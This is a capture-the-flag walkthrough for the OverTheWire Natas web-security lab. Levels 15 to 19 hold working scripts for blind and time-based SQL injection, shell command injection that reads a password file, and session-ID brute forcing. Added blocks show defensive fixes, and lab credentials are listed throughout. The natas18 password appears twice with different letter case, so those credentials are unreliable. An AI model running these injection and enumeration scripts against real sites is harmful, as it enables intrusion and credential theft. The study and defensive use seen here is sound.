Natas Solutions
natas levels
Level 0
Password is in the comments.
Level 1
Open inspect element with the keyboard shortcut and remove the oncontextmenu attribute from the body tag.
Level 2
When you view the source it shows a files/pixel.png element on the page. That implies there is a files folder in the server directory. Open the folder and see the file contents.
Level 3
Open robots.txt and see the disallowed folder. Web crawlers check this file to see which folders not to index.
Level 4
Change the Referer header by setting up a proxy to localhost and then using mitmproxy.
Level 5
Change the cookie by setting up a localhost proxy and using mitmproxy.
Level 6
The PHP source includes a file that holds the secret word needed to reveal the password.
Level 7
Check the HTML. It has a comment naming the page that has the password. Use that as the query parameter in the URL to view the page.
Level 8
Check the PHP source they provide. Decode the string from hexadecimal, reverse it, and base64-decode the result.
Level 9
Comment out the rest of the query and grep the file that has the password, since the input goes unsanitized to passthru.
Level 10
Do the same as before. Asterisk, period and forward slash are not among the filtered characters.
Level 11
Base64-decode the data cookie. XOR it with the known plaintext it was made from to get the XOR key. Once you have the key, change the cookie value to yes, encrypt it with the key, and send that as the cookie.
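Added example (not code from the writeup or from Natas): it reproduces the key recovery this level relies on, with a constructed 4-byte key standing in for the level's real one, and then shows the fix a defender would apply, an HMAC tag over the cookie so an edited body is rejected. DEMO_KEY, SECRET and the function names are assumptions for the demo.

```python
import base64
import hashlib
import hmac

# Constructed demo values (not the level's real key): a 4-byte repeating XOR key
# and the default cookie payload this level encodes, which is the known plaintext.
DEMO_KEY = b"K3y!"
DEFAULT_DATA = b'{"showpassword":"no","bgcolor":"#ffffff"}'
SECRET = b"server-side-secret"  # hypothetical HMAC key for the fixed scheme


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the scheme behind the level's data cookie."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def make_cookie(data: bytes) -> str:
    return base64.b64encode(xor_encrypt(data, DEMO_KEY)).decode()


def recover_key_from_cookie(cookie: str, known_plaintext: bytes) -> bytes:
    """ct XOR pt is the key stream; its shortest period is the key (n == len always matches)."""
    stream = bytes(c ^ p for c, p in zip(base64.b64decode(cookie), known_plaintext))
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]


def sign_cookie(data: bytes, secret: bytes) -> str:
    """Fixed scheme: plaintext cookie plus an HMAC tag; edits without the secret fail."""
    tag = hmac.new(secret, data, hashlib.sha256).hexdigest()
    return base64.b64encode(data).decode() + "." + tag


def verify_cookie(cookie: str, secret: bytes):
    """Return the cookie's data if the tag checks out, else None."""
    try:
        body, tag = cookie.rsplit(".", 1)
        data = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    expected = hmac.new(secret, data, hashlib.sha256).hexdigest()
    return data if hmac.compare_digest(expected.encode(), tag.encode()) else None


def swap_body(cookie: str, new_data: bytes) -> str:
    """Edit a signed cookie's body the way Level 11 edits the XOR one, keeping the old tag."""
    return base64.b64encode(new_data).decode() + "." + cookie.rsplit(".", 1)[1]
```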
Level 12
Create a .php file that cats the password. Change the HTML to send a php file through the form instead of a jpg. Send it and open it in the browser.
Level 13
Add the JPEG magic bytes to the raw hexdump of the file. Then upload it.
Level 14
Comment out the rest of the SQL query after the username.
Level 15
```python
#!/bin/python
import requests

url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
position = 1  # length of the prefix being tested

# Boolean-based blind injection: the page says "exists" only when the injected
# SUBSTR comparison on natas16's password is true. SUBSTR compares
# case-insensitively under MySQL's default collation; Level 17 adds BINARY for that.
test = True
while test:
    test = False
    for i in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                "username": 'natas16" and SUBSTR(password, 1, ' + str(position) + ')="' + password + i
            },
        )
        # print(r.text)
        # print("Letter", i, r.elapsed.total_seconds())
        if "exists" in r.text:
            test = True
            position += 1
            password += i
            print("password:", password, flush=True)
            break  # start the next position from the first character
print("password:", password)
```
Level 16
```python
#!/usr/bin/python
import requests
import string

url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V"
characters = string.ascii_letters + string.digits
# print(characters)
default_needle = "Africans"  # a dictionary word, so it normally appears in the output
password_chars = ""

# Pass 1: which characters occur in the password at all? If grep finds the
# character, its output is appended to the needle, the needle no longer matches
# the dictionary, and "Africans" disappears from the page.
print("chars = ", end="")
for i in characters:
    r = requests.get(
        url,
        auth=(auth_username, auth_password),
        params={"needle": default_needle + "$(grep " + i + " /etc/natas_webpass/natas17)"},
    )
    # print(r.text)
    if default_needle not in r.text:
        password_chars += i
        print(i, end="", flush=True)
print()
print("password chars = ", password_chars)

# Pass 2: extend the known prefix one character at a time with an anchored grep.
# The loop ends when no character extends the prefix any further.
password = ""
found = True
while found:
    found = False
    for i in password_chars:
        r = requests.get(
            url,
            auth=(auth_username, auth_password),
            params={"needle": default_needle + "$(grep ^" + password + i + " /etc/natas_webpass/natas17)"},
        )
        if default_needle not in r.text:
            password += i
            found = True
            print(password)
            break
print("password:", password)
```
A POST method can also be used for this.
Level 17
```python
#!/bin/python
import requests

url = "http://natas17.natas.labs.overthewire.org"
auth_username = "natas17"
auth_password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
position = 1

# Warm-up request so connection setup does not skew the first timed probe.
r = requests.get(
    url,
    auth=(auth_username, auth_password),
    params={
        "username": 'natas18" and IF(BINARY SUBSTR(password, 1, ' + str(position)
        + ')="' + password + '", sleep(4), FALSE) and username = "natas18'
    },
)

# Time-based blind injection: the page gives no output, so a correct prefix is
# signalled by the 4-second sleep. BINARY makes the comparison case-sensitive.
test = True
while test:
    test = False
    for i in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                "username": 'natas18" and IF(BINARY SUBSTR(password, 1, ' + str(position)
                + ')="' + password + i + '", sleep(4), FALSE) and username = "natas18'
            },
        )
        # print(r.text)
        print("Letter", i, r.elapsed.total_seconds())
        if r.elapsed.total_seconds() > 4:
            test = True
            position += 1
            password += i
            print("password:", password, flush=True)
            break
print("password:", password)
```
This is basically a timing attack.
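Added example, not code from the writeup or from Natas, covering Levels 15 and 17 together since the same fix ends both: the vulnerable string-built query beside a parameterised one, run against a constructed in-memory SQLite table with a sample password. The page's prefix-by-prefix loop recovers the sample from the vulnerable function and gets nothing from the fixed one. Table, password and function names are assumptions; SQLite single quotes stand in for the level's double-quoted PHP query.

```python
import sqlite3
import string

# Constructed in-memory stand-in for the level's users table; the password is a sample.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('natas16', 'Sample0Password')")
conn.commit()


def user_exists_vulnerable(username: str) -> bool:
    """String-built query like the level's PHP (single quotes stand in for its double quotes)."""
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return conn.execute(query).fetchone() is not None


def user_exists_fixed(username: str) -> bool:
    """Parameterised query: the input is bound as a value and cannot change the SQL."""
    return conn.execute("SELECT * FROM users WHERE username=?", (username,)).fetchone() is not None


def blind_probe(check, prefix: str) -> bool:
    """The Level 15 oracle: does the stored password start with `prefix`?
    (SQLite's SUBSTR comparison is case-sensitive, so no BINARY is needed here.)"""
    payload = "natas16' AND SUBSTR(password, 1, " + str(len(prefix)) + ")='" + prefix
    return check(payload)


def recover_password(check, alphabet: str = string.ascii_letters + string.digits) -> str:
    """The page's character-by-character loop, run against either implementation."""
    found = ""
    while True:
        nxt = next((c for c in alphabet if blind_probe(check, found + c)), None)
        if nxt is None:
            return found
        found += nxt
```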
Level 18
```python
#!/bin/python
import requests

url = "http://natas18.natas.labs.overthewire.org"
uri = url + "?debug=true"
auth_username = "natas18"
auth_password = "8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq"

s = requests.Session()
s.auth = (auth_username, auth_password)

# Session IDs here are small integers, so try each one until the response
# stops saying "regular user".
for i in range(1, 641):
    print("i =", i)
    r = s.get(uri, cookies={"PHPSESSID": str(i)})
    if "regular user" not in r.text:
        print(r.text)
        break
```
Brute force the session IDs, because that's literally all you can do.
Level 19
```python
#!/bin/python
import requests

url = "http://natas19.natas.labs.overthewire.org"
uri = url + "?debug=true"
auth_username = "natas19"
auth_password = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"

s = requests.Session()
s.auth = (auth_username, auth_password)

# Same idea as Level 18, but the session ID is "<number>-<username>" hex encoded.
for i in range(1, 641):
    # print("i =", i)
    hexed = (str(i) + "-admin").encode().hex()
    # print(hexed)
    r = s.get(uri, cookies={"PHPSESSID": hexed})
    if "regular user" not in r.text:
        print(r.text)
        break
```
Use CyberChef to work out that the session ID is actually hex encoded.
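Added example (not from the writeup) for the defender's side of Levels 18 and 19: a check that flags guessable session IDs of both kinds the page meets (plain counters, and hex that decodes to readable text), a detection pass over constructed access-log lines that spots a client cycling through many session IDs, and the replacement, a random server-generated ID. The log format and all values are constructed for the demo.

```python
import secrets
from collections import defaultdict
from datetime import datetime

# Constructed access-log excerpt (timestamp, client, session cookie, status); not real traffic.
# 10.0.0.5 walks through counter-style IDs and then a hex-wrapped "<n>-admin" one.
LOG_LINES = [
    "2024-05-01T10:00:00 10.0.0.5 PHPSESSID=1 200",
    "2024-05-01T10:00:00 10.0.0.5 PHPSESSID=2 200",
    "2024-05-01T10:00:01 10.0.0.5 PHPSESSID=3 200",
    "2024-05-01T10:00:01 10.0.0.5 PHPSESSID=4 200",
    "2024-05-01T10:00:02 10.0.0.5 PHPSESSID=312d61646d696e 200",
    "2024-05-01T10:00:03 10.0.0.9 PHPSESSID=a1b2c3d4e5f60718293a4b5c6d7e8f90 200",
    "2024-05-01T10:05:00 10.0.0.9 PHPSESSID=a1b2c3d4e5f60718293a4b5c6d7e8f90 200",
]

def parse(line: str):
    ts, client, cookie, status = line.split()
    return datetime.fromisoformat(ts), client, cookie.split("=", 1)[1], int(status)

def looks_predictable(sid: str) -> bool:
    """Flag counter-style IDs (Level 18) and hex that decodes to readable text (Level 19)."""
    if sid.isdigit():
        return True
    try:
        decoded = bytes.fromhex(sid)
    except ValueError:
        return False
    return decoded.isascii() and decoded.decode().isprintable()

def enumeration_suspects(lines, window_s: int = 60, max_distinct: int = 3) -> set:
    """Clients presenting more than max_distinct different session IDs within window_s seconds."""
    events = defaultdict(list)
    for line in lines:
        ts, client, sid, _ = parse(line)
        events[client].append((ts, sid))
    suspects = set()
    for client, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            ids = {sid for t, sid in evs[i:] if (t - t0).total_seconds() <= window_s}
            if len(ids) > max_distinct:
                suspects.add(client)
                break
    return suspects

def new_session_id() -> str:
    """The fix for both levels: a server-generated ID with 128 bits of randomness."""
    return secrets.token_hex(16)
```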
- natas 8: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB
- natas 11: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
- natas 12: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
- natas 14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
- natas 16: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
- natas 18: 8nEduUXg8kFGPV84uLWvzKgn6oKjq6aq
- natas 20: guVaZ3ET35LbgbFMoaN5tFcYT1jEP7UH